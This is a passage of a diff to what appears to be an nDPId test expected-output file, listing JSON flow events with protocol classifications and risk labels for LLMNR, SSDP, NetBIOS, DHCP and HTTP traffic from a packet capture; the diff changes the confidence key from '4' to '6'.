-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104383810,"flow_last_seen":1470104413817,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104382448,"flow_last_seen":1470104427503,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104424738,"flow_last_seen":1470104426276,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104393610,"flow_last_seen":1470104394635,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104391564,"flow_last_seen":1470104422179,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":650,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1470104378021,"flow_last_seen":1470104379520,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104393610,"flow_last_seen":1470104393611,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 